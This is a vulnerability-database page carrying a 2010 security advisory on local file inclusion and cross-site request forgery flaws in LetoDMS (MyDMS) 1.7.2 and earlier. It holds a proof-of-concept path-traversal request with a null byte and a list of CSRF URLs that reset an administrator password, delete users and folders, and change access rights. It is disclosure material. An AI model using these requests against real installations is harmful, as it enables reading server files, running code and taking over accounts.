Lucene search
K
Catalog
Vendors
Products
Timeline
Vulnerabilities
Sources
Documentation
Blog
Glossary
FAQ
Brand assets
Assessment
Agents dashboard
Agent Scanning
API Scanning
Assessment API
Alerts
Email notifications
Webhook notifications
Alerts API
SBOM package analysis
API Reference
Support
Settings
Sign in

LetoDMS Local File Inclusion / Cross Site Request Forgery

🗓️ 16 Jan 2010 00:00:00Reported by Daniel FabianType 
packetstorm
 packetstorm🔗 packetstormsecurity.com👁 51 Views

LetoDMS formerly MyDMS <= 1.7.2 Local File Inclusion and Cross-Site-Request-Forgery vulnerabilitie

Code
`SEC Consult Security Advisory < 20100115-0 >  
========================================================================  
title: Local file inclusion/execution and multiple   
Cross-Site-Request-Forgery vulnerabilities in   
LetoDMS (formerly MyDMS)  
products: LetoDMS (formerly MyDMS)  
vulnerable version: LetoDMS (formerly MyDMS) <= 1.7.2  
fixed version: n.a.  
impact: critical  
homepage: http://sourceforge.net/projects/mydms/  
found: 2009-10-09  
by: D. Fabian / SEC Consult / www.sec-consult.com  
L. Weichselbaum / SEC Consult / www.sec-consult.com  
========================================================================  
  
Vendor description:  
-------------------  
MyDMS is an open-source, web-based document management system (DMS)   
written in PHP with a database backend. Originally coded by Markus   
Westphal, MyDMS provides document meta-data, version control, security   
and easy access to your documents.  
  
source: http://sourceforge.net/projects/mydms/  
  
  
Vulnerability overview/description:  
-----------------------------------  
The lang-parameter of /mydms/op/op.Login.php is vulnerable to file   
inclusion. Through this vulnerability it is possible to read sensitive   
data of the web server and to execute malicious PHP-code.  
  
Furthermore there exist multiple Cross-Site-Request-Forgery  
vulnerabilities which can be used to force a user/admin to execute  
unwanted actions. Some of these actions are:  
* Create new user with admin-privileges  
* Change user credentials  
* Delete a user/folder/document  
* Change owner of a document   
* Change access to a document  
* Add keywords  
* Add notifications  
* Move folders  
  
  
Proof of concept:  
-----------------  
File inclusion/execution  
========================  
If the guest-account is activated or you have a user to log in, it is  
possible to include or execute files. The lang-parameter can be  
modified in a malicious way. To terminate the predefined file-ending a  
null-byte has to be appended after the file to be included. The  
following GET-request can be used to e.g. receive the content of the  
boot.ini-file on a server running Windows as operating system. This  
vulnerability can also be used to execute malicious PHP-code (e.g.  
PHP-code that has been written into log-files).   
  
  
PoC request  
  
GET /mydms/op/op.Login.php?login=guest&sesstheme=&lang=../../../../  
boot.ini%00&sesstheme= HTTP/1.1  
[...]  
  
  
Cross-Site-Request-Forgery (CSRF)  
=================================  
The following requests can be used for CSRF-attacks:  
  
- (only POST) /mydms/op/op.EditUserData.php?pwd=0wned&pwdconf=0wned  
&fullname=Administrator&[email protected]&comment=&userfile=   
- /mydms/op/op.UsrMgr.php?userid=3&action=removeuser  
- /mydms/out/out.RemoveVersion.php?documentid=1&version=1  
- /mydms/op/op.RemoveFolder.php?folderid=2  
- /mydms/op/op.DefaultKeywords.php?action=addcategory&name=test  
- /mydms/op/op.GroupMgr.php?action=addgroup&name=test&comment=  
- /mydms/op/op.FolderAccess.php?action=setowner&folderid=1&ownerid=3  
- /mydms/op/op.FolderAccess.php?folderid=1&action=setdefault&mode=4  
- /mydms/op/op.FolderAccess.php?folderid=1&action=addaccess&userid=3  
&groupid=-1&mode=4  
- /mydms/op/op.FolderNotify.php?folderid=1&action=addnotify&userid=3  
&groupid=-1  
- /mydms/op/op.MoveFolder.php?folderid=4&targetid=1  
  
It is assumed that there is more functionality vulnerable to  
CSRF-attacks  
  
  
Vulnerable versions:  
--------------------  
MyDMS   
* <= 1.7.2  
  
Vendor contact timeline:  
------------------------  
2009-10-29: Contacting developers on SourceForge.Net and on  
trilexnet.com by contact-form and the dev-forum.  
2009-12-11: No response from developers so far.  
2009-12-11: New attempt to contact developers.  
2010-01-15: No response from developers.  
2010-01-15: Release of the advisory.  
  
  
Solution:  
---------  
n.a.  
  
Advisory URL:  
-------------  
https://www.sec-consult.com/advisories.html#a64  
  
  
~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~~  
SEC Consult Unternehmensberatung GmbH  
  
Office Vienna  
Mooslackengasse 17  
A-1190 Vienna  
Austria  
  
Tel.: +43 / 1 / 890 30 43 - 0  
Fax.: +43 / 1 / 890 30 43 - 25  
Mail: research at sec-consult dot com  
www.sec-consult.com  
  
SEC Consult conducts periodical information security workshops on ISO   
27001/BS 7799 in cooperation with BSI Management Systems. For more   
information, please refer to https://www.sec-consult.com/academy_e.html  
  
EOF L. Weichselbaum / @2010  
`

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

Book a live demo
16 Jan 2010 00:00Current
letodmsmydmsfile inclusioncross-site-request-forgeryvulnerabilitiescriticalweb-basedphpcsrf-attackssourceforgeadvisory
51